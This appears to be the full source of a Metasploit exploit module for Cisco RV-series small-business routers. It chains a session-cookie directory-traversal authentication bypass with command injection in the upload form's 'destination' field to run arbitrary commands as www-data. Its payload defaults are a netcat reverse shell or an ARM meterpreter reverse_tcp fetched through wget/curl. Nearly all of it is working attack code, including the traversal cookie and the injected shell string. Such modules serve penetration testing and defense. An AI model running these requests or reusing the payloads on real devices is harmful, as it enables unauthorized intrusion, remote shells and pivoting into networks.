1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  prepend Msf::Exploit::Remote::AutoCheck
10
  include Msf::Exploit::Remote::HttpClient
11
  include Msf::Exploit::CmdStager
12
  include Msf::Exploit::FileDropper
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Cisco RV Series Authentication Bypass and Command Injection',
19
        'Description' => %q{
20
          This module exploits two vulnerabilities, a session ID directory traversal authentication
21
          bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), on Cisco RV160, RV260, RV340,
22
          and RV345 Small Business Routers, allowing attackers to execute arbitrary commands with www-data user privileges.
23
          This access can then be used to pivot to other parts of the network. This module works on firmware
24
          versions 1.0.03.24 and below.
25
        },
26
        'License' => MSF_LICENSE,
27
        'Author' => [
28
          'Biem Pham',  # Vulnerability Discoveries
29
          'Neterum',    # Metasploit Module
30
          'jbaines-r7'  # Inspired from cisco_rv_series_authbypass_and_rce.rb
31
        ],
32
        'DisclosureDate' => '2021-11-02',
33
        'References' => [
34
          ['CVE', '2022-20705'], # Authentication Bypass
35
          ['CVE', '2022-20707'], # Command Injection
36
          ['ZDI', '22-410'], # Authentication Bypass
37
          ['ZDI', '22-411']  # Command Injection
38
        ],
39
        'Targets' => [
40
          [
41
            'Unix Command',
42
            {
43
              'Platform' => 'unix',
44
              'Arch' => ARCH_CMD,
45
              'Type' => :unix_cmd,
46
              'Payload' => {
47
                'BadChars' => '\'#'
48
              },
49
              'DefaultOptions' => {
50
                'PAYLOAD' => 'cmd/unix/reverse_netcat'
51
              }
52
            }
53
          ],
54
          [
55
            'Linux Dropper',
56
            {
57
              'Platform' => 'linux',
58
              'Arch' => [ARCH_ARMLE],
59
              'Type' => :linux_dropper,
60
              'Payload' => {
61
                'BadChars' => '\'#'
62
              },
63
              'CmdStagerFlavor' => [ 'wget', 'curl' ],
64
              'DefaultOptions' => {
65
                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
66
              }
67
            }
68
          ]
69
        ],
70
        'DefaultTarget' => 0,
71
        'DefaultOptions' => {
72
          'RPORT' => 443,
73
          'SSL' => true,
74
          'MeterpreterTryToFork' => true
75
        },
76
        'Notes' => {
77
          'Stability' => [CRASH_SAFE],
78
          'Reliability' => [REPEATABLE_SESSION],
79
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
80
        }
81
      )
82
    )
83
    register_options(
84
      [
85
        OptString.new('TARGETURI', [true, 'Base path', '/'])
86
      ]
87
    )
88
  end
89

90
  # sessionid utilized later needs to be set to length
91
  # of 16 or exploit will fail. Tested with lengths
92
  # 14-17
93
  def generate_session_id
94
    return Rex::Text.rand_text_alphanumeric(16)
95
  end
96

97
  def check
98
    res = send_request_cgi({
99
      'method' => 'GET',
100
      'uri' => '/upload',
101
      'headers' => {
102
        'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id
103
      }
104
    }, 10)
105

106
    # A proper "upload" will trigger file creation. So the send_request_cgi call
107
    # above is an incorrect "upload" call to avoid creating a file on disk. The router will return
108
    # status code 405 Not Allowed if authentication has been bypassed by the above request.
109
    # The firmware containing this authentication bypass also contains the command injection
110
    # vulnerability that will be abused during actual exploitation. Non-vulnerable
111
    # firmware versions will respond with 403 Forbidden.
112
    if res.nil?
113
      return CheckCode::Unknown('The device did not respond to request packet.')
114
    elsif res.code == 405
115
      return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')
116
    elsif res.code == 403
117
      return CheckCode::Safe('The device is not vulnerable to exploitation.')
118
    else # Catch-all
119
      return CheckCode::Unknown('The target responded in an unexpected way. Exploitation is unlikely.')
120
    end
121
  end
122

123
  def execute_command(cmd, _opts = {})
124
    res = send_exploit(cmd)
125

126
    # Successful unix_cmd shells should not produce a response.
127
    # However if a response is returned, check the status code and return
128
    # Failure::NotVulnerable if it is 403 Forbidden.
129
    if target['Type'] == :unix_cmd && res&.code == 403
130
      fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable')
131
    end
132

133
    if target['Type'] == :linux_dropper
134
      fail_with(Failure::Unreachable, 'The target did not respond') unless res
135
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
136
      begin
137
        body_json = res.get_json_document
138
        fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
139
      rescue JSON::ParserError => e
140
        print_error("Failed: #{e.class} - #{e.message}")
141
        fail_with(Failure::UnexpectedReply, 'Failed to parse the response returned from the server! Its possible the response may not be JSON!')
142
      end
143
    end
144

145
    print_good('Exploit successfully executed.')
146
  end
147

148
  def send_exploit(cmd)
149
    filename = Rex::Text.rand_text_alphanumeric(5..12)
150
    fileparam = Rex::Text.rand_text_alphanumeric(5..12)
151
    input = Rex::Text.rand_text_alphanumeric(5..12)
152

153
    # sessionid utilized later needs to be set to length
154
    # of 16 or exploit will fail. Tested with lengths
155
    # 14-17
156
    sessionid = Rex::Text.rand_text_alphanumeric(16)
157

158
    filepath = '/tmp/upload.input' # This file must exist and be writeable by www-data so we just use the temporary upload file to prevent issues.
159
    pathparam = 'Configuration'
160

161
    destination = "'; " + cmd + ' #'
162

163
    multipart_form = Rex::MIME::Message.new
164
    multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"')
165
    multipart_form.add_part(filename, nil, nil, 'form-data; name="filename"')
166
    multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"')
167
    multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"')
168
    multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')
169
    multipart_form.add_part(input, 'application/octet-stream', nil, format('form-data; name="input"; filename="%<filename>s"', filename: filename))
170

171
    # Escaping "/tmp/upload/" folder that does not contain any other permanent files
172
    send_request_cgi({
173
      'method' => 'POST',
174
      'uri' => '/upload',
175
      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
176
      'headers' => {
177
        'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid
178
      },
179
      'data' => multipart_form.to_s
180
    }, 10)
181
  end
182

183
  def exploit
184
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
185
    case target['Type']
186
    when :unix_cmd
187
      execute_command(payload.encoded)
188
    when :linux_dropper
189
      execute_cmdstager(linemax: 120)
190
    end
191
  end
192
end
193

194